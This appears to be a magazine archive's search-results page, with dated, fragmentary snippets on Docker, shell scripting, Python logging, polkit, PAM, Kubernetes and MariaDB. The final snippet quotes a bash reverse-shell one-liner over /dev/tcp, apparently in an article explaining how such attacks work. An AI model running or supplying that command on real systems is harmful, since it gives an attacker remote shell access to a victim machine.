17%
12.09.2013
'll look at creating an image for serving LAMP-stack web applications as an example. Before getting started, you'll need to install Docker. If you're running Ubuntu 12.10 or 13.04, you can skip straight
17%
30.11.2025
clear
03 while true
04 do
05 echo "New record"
06 maxrecord=`ls -1 *.dat | sort | tail -1 | cut -d. -f 1`
07 newrecord=$(echo $maxrecord + 1 | bc )
08 width=`echo $newrecord | wc -c`
09
10 ...
11
12
17%
30.11.2025
mainlog.info('an informative message')
11 mainlog.warning('a warning')
12
13 mylog.debug('no message from My-Module')
14 mylog.setLevel(logging.DEBUG)
15 mylog.debug('another message from My
17%
30.11.2020
detailed documentation [7] and installation packages are available for Debian from version 8, RHEL from version 6, SLES 12, Ubuntu 18.04, and Univention Corporate Server from version 4.2.
Setup Aid
17%
21.08.2014
changes. On recent systems, you can use polkit to do this. As of version 0.112, you even have a separate engine, which you can feed with JavaScript-based rules. You can really do some interesting things
17%
30.11.2025
they are allowed to make another login attempt. If this option is set to 0, login is simply impossible as long as the back-end server remains unavailable.
A problem occurs with this approach if, say, the sudo rules
17%
25.03.2020
-flannel-ds-arm-vdprb 1/1 Running 3 26d
kube-flannel-ds-arm-xnxqp 1/1 Running 0 26d
kube-flannel-ds-arm-zsnpp 1/1 Running 4 34d
kube-proxy-lknwh 1
17%
30.11.2025
users on Lenny will need to access the Experimental repository and then type
aptitude install libthinkfinger0 libpam-thinkfinger thinkfinger-tools
for the install.
Before you modify the existing PAM
17%
02.08.2022
A quick edit of your pristine MariaDB server's configuration file /etc/my.cnf.d/server.cnf (1) binds the MariaDB service to the localhost and (2) connects and (3) creates the database:
Bind-address = 127.0.0
17%
13.12.2018
with Computer A (the victim system) receiving the following code:
$ bash -I <& /dev/tcp/10.0.0.1/444 0<&1
that causes Computer A to connect to Computer B (the attacking system that receives the connection from